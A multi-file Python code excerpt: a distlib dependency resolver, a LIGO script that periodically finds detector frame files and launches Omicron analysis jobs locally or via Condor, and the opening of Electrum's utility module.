                             r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
    """
    Locate dependencies for distributions.
    """
    def __init__(self, locator=None):
        """
        Initialise an instance, using the specified locator
        to locate distributions.
        """
        self.locator = locator or default_locator
        self.scheme = get_scheme(self.locator.scheme)
    def add_distribution(self, dist):
        """
        Add a distribution to the finder. This will update internal information
        about who provides what.
        :param dist: The distribution to add.
        """
        logger.debug('adding distribution %s', dist)
        name = dist.key
        self.dists_by_name[name] = dist
        self.dists[(name, dist.version)] = dist
        # Record everything this distribution provides, so that requirements
        # can later be matched against it in find_providers.
        for p in dist.provides:
            name, version = parse_name_and_version(p)
            logger.debug('Add to provided: %s, %s, %s', name, version, dist)
            self.provided.setdefault(name, set()).add((version, dist))
    def remove_distribution(self, dist):
        """
        Remove a distribution from the finder. This will update internal
        information about who provides what.
        :param dist: The distribution to remove.
        """
        logger.debug('removing distribution %s', dist)
        name = dist.key
        del self.dists_by_name[name]
        del self.dists[(name, dist.version)]
        for p in dist.provides:
            name, version = parse_name_and_version(p)
            logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
            s = self.provided[name]
            s.remove((version, dist))
            # Drop the entry entirely once no providers remain for this name.
            if not s:
                del self.provided[name]
    def get_matcher(self, reqt):
        """
        Get a version matcher for a requirement.
        :param reqt: The requirement
        :type reqt: str
        :return: A version matcher (an instance of
                 :class:`distlib.version.Matcher`).
        """
        try:
            matcher = self.scheme.matcher(reqt)
        except UnsupportedVersionError: # pragma: no cover
            # XXX compat-mode if cannot read the version
            name = reqt.split()[0]
            matcher = self.scheme.matcher(name)
        return matcher
    def find_providers(self, reqt):
        """
        Find the distributions which can fulfill a requirement.
        :param reqt: The requirement.
        :type reqt: str
        :return: A set of distribution which can fulfill the requirement.
        """
        matcher = self.get_matcher(reqt)
        name = matcher.key   # case-insensitive
        result = set()
        provided = self.provided
        if name in provided:
            for version, provider in provided[name]:
                try:
                    match = matcher.match(version)
                except UnsupportedVersionError:
                    match = False
                # Only the first matching provider is returned.
                if match:
                    result.add(provider)
                    break
        return result
    def try_to_replace(self, provider, other, problems):
        """
        Attempt to replace one provider with another. This is typically used
        when resolving dependencies from multiple sources, e.g. A requires
        (B >= 1.0) while C requires (B >= 1.1).
        For successful replacement, ``provider`` must meet all the requirements
        which ``other`` fulfills.
        :param provider: The provider we are trying to replace with.
        :param other: The provider we're trying to replace.
        :param problems: If False is returned, this will contain what
                         problems prevented replacement. This is currently
                         a tuple of the literal string 'cantreplace',
                         ``provider``, ``other``  and the set of requirements
                         that ``provider`` couldn't fulfill.
        :return: True if we can replace ``other`` with ``provider``, else
                 False.
        """
        rlist = self.reqts[other]
        unmatched = set()
        # Check that every requirement satisfied by 'other' is also satisfied
        # by 'provider'.
        for s in rlist:
            matcher = self.get_matcher(s)
            if not matcher.match(provider.version):
                unmatched.add(s)
        if unmatched:
            # can't replace other with provider
            problems.add(('cantreplace', provider, other,
                          frozenset(unmatched)))
            result = False
        else:
            # can replace other with provider
            self.remove_distribution(other)
            del self.reqts[other]
            for s in rlist:
                self.reqts.setdefault(provider, set()).add(s)
            self.add_distribution(provider)
            result = True
        return result
    def find(self, requirement, meta_extras=None, prereleases=False):
        """
        Find a distribution and all distributions it depends on.
        :param requirement: The requirement specifying the distribution to
                            find, or a Distribution instance.
        :param meta_extras: A list of meta extras such as :test:, :build: and
                            so on.
        :param prereleases: If ``True``, allow pre-release versions to be
                            returned - otherwise, don't return prereleases
                            unless they're all that's available.
        Return a set of :class:`Distribution` instances and a set of
        problems.
        The distributions returned should be such that they have the
        :attr:`required` attribute set to ``True`` if they were
        from the ``requirement`` passed to ``find()``, and they have the
        :attr:`build_time_dependency` attribute set to ``True`` unless they
        are post-installation dependencies of the ``requirement``.
        The problems should be a tuple consisting of the string
        ``'unsatisfied'`` and the requirement which couldn't be satisfied
        by any distribution known to the locator.
        """
        # Per-call state: who provides what, dists found so far, and the
        # requirements recorded against each dist (used by try_to_replace).
        self.provided = {}
        self.dists = {}
        self.dists_by_name = {}
        self.reqts = {}
        meta_extras = set(meta_extras or [])
        if ':*:' in meta_extras:
            meta_extras.remove(':*:')
            # :meta: and :run: are implicitly included
            meta_extras |= set([':test:', ':build:', ':dev:'])
        if isinstance(requirement, Distribution):
            dist = odist = requirement
            logger.debug('passed %s as requirement', odist)
        else:
            dist = odist = self.locator.locate(requirement,
                                               prereleases=prereleases)
            if dist is None:
                raise DistlibException('Unable to locate %r' % requirement)
            logger.debug('located %s', odist)
        dist.requested = True
        problems = set()
        # Worklist algorithm: process each distribution once, queueing newly
        # discovered providers of its requirements.
        todo = set([dist])
        install_dists = set([odist])
        while todo:
            dist = todo.pop()
            name = dist.key     # case-insensitive
            if name not in self.dists_by_name:
                self.add_distribution(dist)
            else:
                #import pdb; pdb.set_trace()
                other = self.dists_by_name[name]
                if other != dist:
                    self.try_to_replace(dist, other, problems)
            # Install-time vs build-time requirements; extras are only
            # considered for dists that will actually be installed.
            ireqts = dist.run_requires | dist.meta_requires
            sreqts = dist.build_requires
            ereqts = set()
            if meta_extras and dist in install_dists:
                for key in ('test', 'build', 'dev'):
                    e = ':%s:' % key
                    if e in meta_extras:
                        ereqts |= getattr(dist, '%s_requires' % key)
            all_reqts = ireqts | sreqts | ereqts
            for r in all_reqts:
                providers = self.find_providers(r)
                if not providers:
                    logger.debug('No providers found for %r', r)
                    provider = self.locator.locate(r, prereleases=prereleases)
                    # If no provider is found and we didn't consider
                    # prereleases, consider them now.
                    if provider is None and not prereleases:
                        provider = self.locator.locate(r, prereleases=True)
                    if provider is None:
                        logger.debug('Cannot satisfy %r', r)
                        problems.add(('unsatisfied', r))
                    else:
                        n, v = provider.key, provider.version
                        if (n, v) not in self.dists:
                            todo.add(provider)
                        providers.add(provider)
                        if r in ireqts and dist in install_dists:
                            install_dists.add(provider)
                            logger.debug('Adding %s to install_dists',
                                         provider.name_and_version)
                for p in providers:
                    name = p.key
                    if name not in self.dists_by_name:
                        self.reqts.setdefault(p, set()).add(r)
                    else:
                        other = self.dists_by_name[name]
                        if other != p:
                            # see if other can be replaced by p
                            self.try_to_replace(p, other, problems)
        # Anything not needed post-installation is a build-time dependency.
        dists = set(self.dists.values())
        for dist in dists:
            dist.build_time_dependency = dist not in install_dists
            if dist.build_time_dependency:
                logger.debug('%s is a build-time dependency only.',
                             dist.name_and_version)
        logger.debug('find done for %s', odist)
        return dists, problems
|
mp_crawler.py | #!/usr/bin/python
usage = "crawler.py [--options] config.ini"
description = "a script that lives persistently and forks off Omicron jobs periodically"
author = "R. Essick (reed.essick@ligo.org)"
#import lal
from lal import gpstime
from pylal import Fr
import os
import sys ### only needed if we touch sys.stdout?
import multiprocessing as mp
import subprocess as sp
import numpy as np
import time
import logging
from ConfigParser import SafeConfigParser
from optparse import OptionParser
#=================================================
def __safe_fork(cmd, stdin=None, stdout=None, stderr=None):
    """
    helper for a double fork. This is called by multiprocessing to orphan the actual processes

    cmd    : the command sequence handed to subprocess.Popen
    stdin  : optional path, opened for reading and attached as the child's stdin
    stdout : optional path, opened for writing and attached as the child's stdout
    stderr : optional path, opened for writing and attached as the child's stderr

    we don't wait, communicate or call
    by returning, this process will die and orphan the subprocess
    """
    ### map each requested stream onto an opened file object; building a
    ### kwargs dict replaces the old combinatorial if/elif chain over all
    ### 8 possible (stdin, stdout, stderr) combinations
    handles = {}
    if stdin:
        handles['stdin'] = open(stdin, "r")
    if stdout:
        handles['stdout'] = open(stdout, "w")
    if stderr:
        handles['stderr'] = open(stderr, "w")
    try:
        p = sp.Popen(cmd, **handles) ### launch subprocess
    finally:
        ### close our copies of the handles even if Popen raises (the old
        ### code leaked them in that case); the child keeps its own
        ### duplicated descriptors
        for handle in handles.values():
            handle.close()
###
def safe_fork(cmd, stdin=None, stdout=None, stderr=None):
    """
    a wrapper for a double fork: run __safe_fork in a short-lived
    multiprocessing child so the subprocess it spawns is orphaned.
    """
    worker = mp.Process(target=__safe_fork, args=(cmd, stdin, stdout, stderr))
    worker.start()   # launch the intermediate process
    worker.join()    # block until it exits, which orphans the grandchild
###
def report(statement, verbose):
    """
    wrapper for reporting output: always logs `statement` to the module-level
    `logger`, and additionally echoes it to stdout when `verbose` is true.
    """
    if verbose:
        print statement  # Python 2 print statement; this script targets py2 throughout
    logger.info(statement)  # `logger` is the module global configured at startup
###
def find_frames(ldr_server, ldr_url_type, ldr_type, ifo, start, stride, verbose=False):
    """
    wrapper for ligo_data_find: query the datafind server for frame files of
    `ldr_type` covering [start, start+stride] and return their local paths.
    """
    cmd = "ligo_data_find --server=%s --url-type=%s --type=%s --observatory=%s --gps-start-time=%d --gps-end-time=%d"%(ldr_server, ldr_url_type, ldr_type, ifo, start, start+stride)
    report(cmd, verbose)
    proc = sp.Popen(cmd.split(), stdout=sp.PIPE, stderr=sp.STDOUT)
    output = proc.communicate()[0]
    # "No files found!" means an empty list; flatten newlines and strip the
    # file://localhost scheme so we are left with bare paths
    output = output.replace("No files found!", "").replace("\n", " ")
    output = output.replace("file://localhost", "")
    return [path for path in output.split() if path.endswith(".gwf")]
###
def coverage(frames, start, stride):
    """
    determines how much of [start, start+stride] is covered by these frames
    assumes non-overlapping frames!

    Frame names are assumed to follow the LIGO convention
    <obs>-<type>-<gpsstart>-<duration>.gwf; the gps start and duration are the
    last two '-'-separated fields.

    Returns the covered fraction in [0, 1].
    """
    ### generate segments from frame names.
    ### NOTE: the original used frame.strip(".gwf"), which strips the CHARACTER
    ### SET {., g, w, f} from both ends (e.g. it would eat a leading "f" of a
    ### relative path); remove the literal suffix instead.
    segs = []
    for frame in sorted(frames):
        base = frame[:-len(".gwf")] if frame.endswith(".gwf") else frame
        segs.append([float(l) for l in base.split("-")[-2:]])
    ### check whether segments overlap with desired time range
    covered = 1.0*stride          # seconds still uncovered (float for the final ratio)
    end = start + stride
    for s, d in segs:
        e = s+d
        if (s < end) and (start < e): ### at least some overlap
            covered -= min(e, end) - max(s, start) ### subtract the overlap
        if covered <= 0:
            break  # fully covered; no need to look at further frames
    return 1 - covered/stride ### return fraction of coverage
###
def str_framecache(frames, ifo, type):
    """
    build a string for the framecache: one "ifo type gpsstart duration path"
    line per frame.

    Uses proper suffix removal (the original frame.strip(".gwf") strips a
    character set, not the literal suffix) and a single join instead of
    repeated string concatenation.
    """
    lines = []
    for frame in frames:
        base = frame[:-len(".gwf")] if frame.endswith(".gwf") else frame
        # gps start and duration are the last two '-'-separated fields
        s, d = base.split("-")[-2:]
        lines.append("%s %s %s %s %s\n"%(ifo, type, s, d, frame))
    return "".join(lines)
###
def extract_scisegs(frames, channel, bitmask, start, stride):
    """
    extract scisegs from channel in frames using bitmask

    Reads the state vector `channel` from each frame with pylal's
    Fr.frgetvect1d, finds the stretches where the vector equals `bitmask`,
    converts them to [start, end] time pairs, and merges abutting pairs.

    NOTE(review): `start` and `stride` are accepted but never used in the
    body -- segments are NOT clipped to [start, start+stride]; confirm whether
    clipping was intended (one caller passes an end time as `stride`).
    NOTE(review): the state test is exact equality (vect == bitmask), not a
    bit-test (vect & bitmask) -- confirm that is the intended semantics.
    """
    if not frames: ### empty list, so no segments
        return []
    ### extract vectors and build segments
    segset = []
    for frame in frames:
        ### extract the vector from the frame
        vect, s, ds, dt, xunit, yunit = Fr.frgetvect1d(frame, channel)
        n = len(vect)
        ### build time vector   add starting time
        t = np.arange(0, dt*n, dt) + s+ds
        ### determine whether state acceptable
        ### add "False" buffers to set up the computation of start and end time
        state = np.concatenate( ([False], vect == bitmask, [False]))
        ### determine beginning of segments
        ###      i=False      i+1 = True  strip the trailing buffer
        b = ( (1-state[:-1])*(state[1:]) )[:-1].astype(bool)
        b = t[b] ### select out times
        ### determine end of segments
        ###     i=True     i+1=False      strip the leading buffer
        e = ( (state[:-1])*(1-state[1:]) )[1:].astype(bool)
        e = t[e] + dt ### select out times
                      ### extra dt moves these markers to the end of segments
        ### stitch together start and end times, append to global list
        segset += list( np.transpose( np.array( [b, e] ) ) )
    if not segset: ### empty list
        return []
    ### clean up segs! merge adjacent segments whose boundaries touch exactly
    segs = []
    seg1 = segset[0]
    for seg2 in segset[1:]:
        if seg1[1] == seg2[0]:
            seg1[1] = seg2[1] ### join the segments
        else:
            segs.append( list(seg1) )
            seg1 = seg2
    segs.append( list(seg1) )
    ### return final list of lists!
    return segs
###
def str_omicron_config(framecache, channels, samplefrequency=4096, chunkduration=32, blockduration=32, overlapduration=4, windows=[2,4], fftplan="ESTIMATE", frequencyrange=[32,2048], qrange=[3,141], mismatch=0.2, snrthreshold=5.5, nmax=1e6, clustering="time", outputdir="./", format=["xml"], verbosity=0, writepsd=0, writetimeseries=0, writewhiteneddata=0, plotstyle="GWOLLUM"):
    """
    builds the string that represents the omicron parameter file

    `channels` maps channel name -> native sampling frequency. Lines are
    accumulated in a list and joined once at the end, avoiding the repeated
    string concatenation of a naive implementation.
    """
    ### data section
    lines = ["DATA\tLCF\t%s"%framecache]
    for channel, nativefrequency in channels.items():
        lines.append("DATA\tCHANNELS\t%s"%channel)
        lines.append("DATA\tNATIVEFREQUENCY\t%d"%nativefrequency)
    lines.append("DATA\tSAMPLEFREQUENCY\t%d"%samplefrequency)
    ### analysis parameters
    lines.append("PARAMETER\tCHUNKDURATION\t%d"%chunkduration)
    lines.append("PARAMETER\tBLOCKDURATION\t%d"%blockduration)
    lines.append("PARAMETER\tOVERLAPDURATION\t%d"%overlapduration)
    lines.append("PARAMETER\tWINDOWS\t%s"%" ".join([str(w) for w in windows]))
    lines.append("PARAMETER\tFFTPLAN\t%s"%fftplan)
    lines.append("PARAMETER\tFREQUENCYRANGE\t%.4f\t%.4f"%tuple(frequencyrange))
    lines.append("PARAMETER\tQRANGE\t%.4f\t%.4f"%tuple(qrange))
    lines.append("PARAMETER\tMISMATCHMAX\t%.4f"%mismatch)
    ### trigger selection
    lines.append("TRIGGER\tSNRTHRESHOLD\t%.4f"%snrthreshold)
    lines.append("TRIGGER\tNMAX\t%d"%int(nmax))
    lines.append("TRIGGER\tCLUSTERING\t%s"%clustering)
    ### output products
    lines.append("OUTPUT\tDIRECTORY\t%s"%outputdir)
    lines.append("OUTPUT\tFORMAT\t%s"%(",".join(format)))
    lines.append("OUTPUT\tVERBOSITY\t%d"%verbosity)
    lines.append("OUTPUT\tWRITEPSD\t%d"%writepsd)
    lines.append("OUTPUT\tWRITETIMESERIES\t%d"%writetimeseries)
    lines.append("OUTPUT\tWRITEWHITENEDDATA\t%d"%writewhiteneddata)
    lines.append("OUTPUT\tPLOTSTYLE\t%s"%plotstyle)
    return "\n".join(lines) + "\n"
###
def str_omicron_sub(universe, executable, arguments, log, output, error, getenv=True, notification="never"):
    """
    builds a string that represents a condor sub file for omicron

    NOTE: `getenv` is accepted but no "getenv" line is written to the sub
    file; this mirrors the established contract of this function.
    """
    sub_lines = [
        "universe = %s"%universe,
        "executable = %s"%executable,
        "arguments = %s"%" ".join(arguments),
        "log = %s"%log,
        "output = %s"%output,
        "error = %s"%error,
        "notification = %s"%notification,
        "queue 1",
    ]
    return "\n".join(sub_lines) + "\n"
#=================================================
### command-line interface: a single positional argument, the config.ini path
parser = OptionParser(usage=usage, description=description)
parser.add_option("-v", "--verbose", default=False, action="store_true")
parser.add_option("", "--no-robot-cert", default=False, action="store_true", help="do not use robot cert specified in config file")
parser.add_option("-s", "--gps-start", default=None, type="int")
parser.add_option("-e", "--gps-end", default=np.infty, type="float")  # default: run forever
opts, args = parser.parse_args()
if len(args) != 1:
    raise StandardError("Please supply only a single argument")  # StandardError is Python 2 only
configfile = args[0]
#=================================================
config = SafeConfigParser()
config.read(configfile)
#=================================================
### setup logger to record processes
logfilename = config.get("general","logfile")
### ensure that path to log will exist
logpath = "/".join(logfilename.split("/")[:-1])
if logfilename[0] == "/":
    logpath = "/%s"%logpath  # re-anchor at root (may produce a harmless double slash)
if not os.path.exists(logpath):
    os.makedirs(logpath)
global logger  # no-op at module level; documents intent that helpers read this global
logger = logging.getLogger('crawler_log')
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(message)s')
### file handler only; console echo is handled separately by report()
hdlr = logging.FileHandler(logfilename)
hdlr.setFormatter(formatter)
hdlr.setLevel(logging.INFO)
logger.addHandler(hdlr)
#=================================================
### source environment scripts
report("sourcing environment", opts.verbose)
for reason, script in config.items("environment"):
    cmd = "source %s"%(script)
    report(cmd, opts.verbose)
    # NOTE(review): this runs the script in a CHILD bash process; it cannot
    # modify this process's environment, so "sourcing" here only verifies the
    # script runs cleanly -- confirm that is the intent.
    p = sp.Popen(cmd.split(), executable="/bin/bash", stdout=sp.PIPE)
    report(p.communicate()[0].strip("\n"), opts.verbose)
    if 0 != p.returncode:
        raise StandardError("failed to source %s"%script)
### robot cert: switch from any personal proxy to the configured robot credentials
if not opts.no_robot_cert:
    if os.environ.has_key("X509_USER_PROXY"):  # has_key is Python 2 only
        del os.environ['X509_USER_PROXY']
    ### set cert and key
    os.environ['X509_USER_CERT'] = config.get('robot cert', 'robot_certificate')
    os.environ['X509_USER_KEY'] = config.get('robot cert', 'robot_key')
#=================================================
report("pulling out parameters from : %s"%configfile, opts.verbose)
### pull out basic parameters
ifo = config.get("general", "ifo")
outputdir = config.get("general", "outputdir")
stride = config.getint("general", "stride")      # analysis stride [s]
delay = config.getint("general", "delay")        # latency allowance before analyzing [s]
padding = config.getint("general", "padding")    # extra data on each side of the stride [s]
max_wait = config.getint("general", "max_wait")  # how long to poll for missing frames [s]
#========================
### pull out ldr params
ldr_server = config.get("ligo_data_find", "server")
ldr_url_type = config.get("ligo_data_find", "url-type")
ldr_type = config.get("ligo_data_find", "type")
#========================
### pull out sciseg params
sciseg_channel = config.get("scisegs","channel")
sciseg_bitmask = config.getint("scisegs","bitmask")
#========================
### pull out omicron run parameters
block = config.getboolean("omicron", "block") ### whether to block
condor = config.getboolean("omicron", "condor") ### whether to use condor
scisegs = config.getboolean("omicron","scisegs") ### whether to use scisegs
executable = config.get("omicron", "executable")
### output formatting
# SECURITY: eval() on config values executes arbitrary code from the ini
# file; acceptable only because the config is operator-controlled.
format = eval(config.get("omicron","format"))
verbosity = config.getint("omicron","verbosity")
writepsd = config.getint("omicron","writepsd")
writetimeseries = config.getint("omicron","writetimeseries")
writewhiteneddata = config.getint("omicron","writewhiteneddata")
plotstyle = config.get("omicron","plotstyle")
### set up params_string for each channel_set; the "%s" placeholders
### (framecache, outputdir) are filled in per-stride inside the main loop
params_strings = []
for section_name in sorted(config.options("channel sets")):
    report("setting up template omicron params file for : %s"%section_name, opts.verbose)
    params_strings.append( ( section_name,
                             str_omicron_config( "%s", # will be filled in later
                                                 dict( ("%s1:%s"%(ifo,key.upper()), float(value)) for key, value in config.items("%s channels"%section_name) ),
                                                 samplefrequency = config.getint(section_name,"samplefrequency"),
                                                 chunkduration = config.getint(section_name,"chunkduration"),
                                                 blockduration = config.getint(section_name,"blockduration"),
                                                 overlapduration = config.getint(section_name,"overlapduration"),
                                                 windows = eval(config.get(section_name,"windows")),
                                                 fftplan = config.get(section_name,"fftplan"),
                                                 frequencyrange = eval(config.get(section_name,"frequencyrange")),
                                                 qrange = eval(config.get(section_name,"qrange")),
                                                 mismatch = config.getfloat(section_name,"mismatch"),
                                                 snrthreshold = config.getfloat(section_name,"snrthreshold"),
                                                 nmax = config.getint(section_name,"nmax"),
                                                 clustering = config.get(section_name,"clustering"),
                                                 outputdir="%s", # will be filled in later
                                                 format=format,
                                                 verbosity=verbosity,
                                                 writepsd=writepsd,
                                                 writetimeseries=writetimeseries,
                                                 writewhiteneddata=writewhiteneddata,
                                                 plotstyle=plotstyle
                                               )
                           )
                         )
### set up condor files if needed
if condor:
    report("setting up condor sub files", opts.verbose)
    ### write sub template; the "%s" slots are (arguments x2, log, out, err)
    report("building sub template", opts.verbose)
    sub_string = str_omicron_sub("vanilla", executable, ["%s", "%s"], "%s", "%s", "%s", getenv=True, notification="never")
#=================================================
### setting up initial time, rounded DOWN to an integer number of strides
### (Python 2 integer division)
report("", opts.verbose)
if opts.gps_start == None:
    t = ( int(gpstime.gps_time_now()) / stride)*stride
else:
    t = (opts.gps_start/stride)*stride ### round to integer number of strides
#=================================================
# LOOP until we "finish"
#=================================================
### main loop: process one stride per iteration until we pass opts.gps_end
while t < opts.gps_end:
    report("=========================================================================", opts.verbose)
    report("processing stride: [%d-%d, %d+%d]"%(t, padding, t+stride, padding), opts.verbose)

    ### wait until the stride (plus latency allowance) should exist on disk
    nowgps = float( gpstime.gps_time_now() )
    wait = (t+stride+padding) + delay - nowgps
    if wait > 0:
        report("sleeping for %d sec"%wait, opts.verbose)
        time.sleep(wait)

    ### build directories, bucketed by the leading gps digits (t/100000)
    t5 = t/100000
    segdir = "%s/segments/%s-%d/"%(outputdir, ifo, t5)
    logdir = "%s/logs/%s-%d/"%(outputdir, ifo, t5)
    framedir = "%s/frames/%s-%d/"%(outputdir, ifo, t5)
    trgdir = "%s/triggers/%s-%d/"%(outputdir, ifo, t5)
    for directory in [outputdir, segdir, logdir, framedir, trgdir]:
        if not os.path.exists(directory):
            report("building directory : %s"%directory, opts.verbose)
            os.makedirs(directory)
    if condor:
        condordir = "%s/condor/%s-%d/"%(outputdir, ifo, t5)
        if not os.path.exists(condordir):
            report ("building directory : %s"%condordir, opts.verbose)
            os.makedirs(condordir)

    ### find frames within time window
    report("finding frames within stride", opts.verbose)
    frames = find_frames(ldr_server, ldr_url_type, ldr_type, ifo, t-padding, stride+2*padding, verbose=opts.verbose)
    covered = coverage( frames, t-padding, stride+2*padding) ### find out the coverage

    ### keep looking every second until we either find frames or time out
    if covered < 1.0:
        report("coverage = %.5f < 1.0, we'll check every second for more frames and wait at most %d seconds before proceeding."%(covered, max_wait), opts.verbose)
        while (covered < 1.0) and ( (float(gpstime.gps_time_now()) - ( (t+stride+padding) + delay ) ) < max_wait ):
            time.sleep( 1 ) # don't break the file system
            frames = find_frames(ldr_server, ldr_url_type, ldr_type, ifo, t-padding, stride+2*padding, verbose=False) ### don't report this every time in the loop
            covered = coverage( frames, t-padding, stride+2*padding) ### find out the coverage
        if covered >= 1.0:
            ### FIX: report() requires a verbosity argument; the bare
            ### report("covered >= 1.0") raised TypeError at runtime
            report("covered >= 1.0", opts.verbose)
        if covered < 1.0:
            report("coverage = %.5f < 1.0, but we've timed out after waiting at least %d seconds."%(covered, max_wait), opts.verbose)

    ### write framecache
    framecache = "%s/%s_%d-%d.lcf"%(framedir, ifo, t, stride)
    report("writing framecache : %s"%framecache, opts.verbose)
    framecache_obj = open(framecache, "w")
    framecache_obj.write( str_framecache(frames, ifo, ldr_type) )
    framecache_obj.close()

    ### if we have data, process it!
    if not frames:
        report("no frames found! skipping...", opts.verbose)
    else:
        ### find scisegs
        segfile = "%s/%s_%d-%d.seg"%(segdir, ifo, t, stride)
        if scisegs: ### extract from ODC vector in frames
            report("extracting scisegs to : %s"%(segfile), opts.verbose)
            # NOTE(review): extract_scisegs's last parameter is named "stride"
            # but receives an end time; harmless today because the function
            # ignores both trailing args -- confirm before relying on them
            segs = extract_scisegs(frames, "%s1:%s"%(ifo, sciseg_channel), sciseg_bitmask, t-padding, t+stride+padding)
        else: ### use entire segment for analysis
            report("using analysis segment as scisegs", opts.verbose)
            segs = [(t-padding, t+stride+padding)]
        report("writing scisegs : %s"%segfile, opts.verbose)
        file_obj = open(segfile, "w")
        for a, b in segs:
            ### FIX: newline was missing, so consecutive segments ran
            ### together on a single unparseable line
            file_obj.write("%d %d\n"%(a, b))
        file_obj.close()

        ### launch jobs
        if block: ### run from here and block
            procs = []
            for channel_set, params_string in params_strings: ### iterate over separate jobs
                ### write omicron params file
                params = "%s/%s_%s-%d-%d.params"%(logdir, ifo, channel_set, t, stride)
                report("writing params : %s"%params, opts.verbose)
                file_obj = open(params, 'w')
                file_obj.write(params_string%(framecache, trgdir))
                file_obj.close()
                out = "%s/%s_%s-%d-%d.out"%(logdir, ifo, channel_set, t, stride)
                err = "%s/%s_%s-%d-%d.err"%(logdir, ifo, channel_set, t, stride)
                cmd = "%s %s %s"%(executable, segfile, params)
                report(cmd, opts.verbose)
                report("out: %s"%out, opts.verbose)
                report("err: %s"%err, opts.verbose)
                out_obj = open(out, "w")
                err_obj = open(err, "w")
                procs.append( (cmd, sp.Popen(cmd.split(), stdout=out_obj, stderr=err_obj)) )
                out_obj.close()
                err_obj.close()
            while procs:
                cmd, p = procs.pop(0)
                p.wait() ### block!
        elif condor: ### run under condor
            procs = []
            for channel_set, params_string in params_strings: ### iterate over separate jobs
                ### write omicron params file
                params = "%s/%s_%s-%d-%d.params"%(logdir, ifo, channel_set, t, stride)
                report("writing params : %s"%params, opts.verbose)
                file_obj = open(params, 'w')
                file_obj.write(params_string%(framecache, trgdir))
                file_obj.close()
                log = "%s/%s_%s-%d-%d.log"%(logdir, ifo, channel_set, t, stride)
                out = "%s/%s_%s-%d-%d.out"%(logdir, ifo, channel_set, t, stride)
                err = "%s/%s_%s-%d-%d.err"%(logdir, ifo, channel_set, t, stride)
                sub = "%s/%s_%s-%d-%d.sub"%(condordir, ifo, channel_set, t, stride)
                report("sub: %s"%sub, opts.verbose)
                report("log: %s"%log, opts.verbose)
                report("out: %s"%out, opts.verbose)
                report("err: %s"%err, opts.verbose)
                ### write sub
                file_obj = open(sub, "w")
                file_obj.write(sub_string%(segfile, params, log, out, err))
                file_obj.close()
                ### submit through condor
                cmd = "condor_submit %s"%sub
                report(cmd, opts.verbose)
                procs.append( (cmd, sp.Popen(cmd.split(), stdout=sys.stdout, stderr=sys.stderr)) )
            while procs:
                cmd, p = procs.pop(0)
                p.wait()
        else: ### run from here but do not block
            for channel_set, params_string in params_strings: ### iterate over separate jobs
                ### write omicron params file
                ### FIX: format string had six placeholders ("-%d_%d-%d") for
                ### five arguments, raising TypeError; now matches the
                ### block/condor branches
                params = "%s/%s_%s-%d-%d.params"%(logdir, ifo, channel_set, t, stride)
                report("writing params : %s"%params, opts.verbose)
                file_obj = open(params, 'w')
                file_obj.write(params_string%(framecache, trgdir))
                file_obj.close()
                out = "%s/%s_%s-%d-%d.out"%(logdir, ifo, channel_set, t, stride)
                err = "%s/%s_%s-%d-%d.err"%(logdir, ifo, channel_set, t, stride)
                cmd = "%s %s %s"%(executable, segfile, params)
                report(cmd, opts.verbose)
                report("out: %s"%out, opts.verbose)
                report("err: %s"%err, opts.verbose)
                safe_fork(cmd.split(), stdout=out, stderr=err)
    report("Done with stride: [%d-%d, %d+%d]"%(t, padding, t+stride, padding), opts.verbose)
    ### increment!
    t += stride
|
util.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, re, json
import platform
import shutil
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urlparse
import urllib
import threading
from i18n import _
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
    """Convert a dotted version string into a list of ints, dropping trailing
    zero components (so "3.0.0" and "3" compare equal)."""
    trimmed = re.sub(r'(\.0+)*$', '', v)
    return [int(part) for part in trimmed.split(".")]
# Raised when a transaction cannot be funded from the available coins.
class NotEnoughFunds(Exception): pass

# Raised when wallet decryption fails; str() gives a translated message.
class InvalidPassword(Exception):
    def __str__(self):
        return _("Incorrect password")


# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
    '''An exception that is suppressed from the user'''
    pass
class MyEncoder(json.JSONEncoder):
    """JSON encoder that additionally serializes Transaction objects
    (via their as_dict() form)."""
    def default(self, obj):
        # local import; presumably avoids a circular import at module load -- confirm
        from transaction import Transaction
        if isinstance(obj, Transaction):
            return obj.as_dict()
        return super(MyEncoder, self).default(obj)
class PrintError(object):
    '''A handy base class: prefixes every message with the subclass name so
    log output can be attributed to its source.'''
    def diagnostic_name(self):
        # subclasses may override to provide a more specific label
        return self.__class__.__name__

    def print_error(self, *msg):
        # delegates to the module-level print_error (stderr, verbose-gated)
        print_error("[%s]" % self.diagnostic_name(), *msg)

    def print_msg(self, *msg):
        # delegates to the module-level print_msg (stdout, always)
        print_msg("[%s]" % self.diagnostic_name(), *msg)


class ThreadJob(PrintError):
    """A job that is run periodically from a thread's main loop.  run() is
    called from that thread's context.
    """
    def run(self):
        """Called periodically from the thread"""
        pass


class DebugMem(ThreadJob):
    '''A handy class for debugging GC memory leaks: periodically counts live
    instances of the watched classes.'''
    def __init__(self, classes, interval=30):
        self.next_time = 0          # next gps/unix time a scan is due
        self.classes = classes      # classes whose instance counts are reported
        self.interval = interval    # seconds between scans

    def mem_stats(self):
        import gc
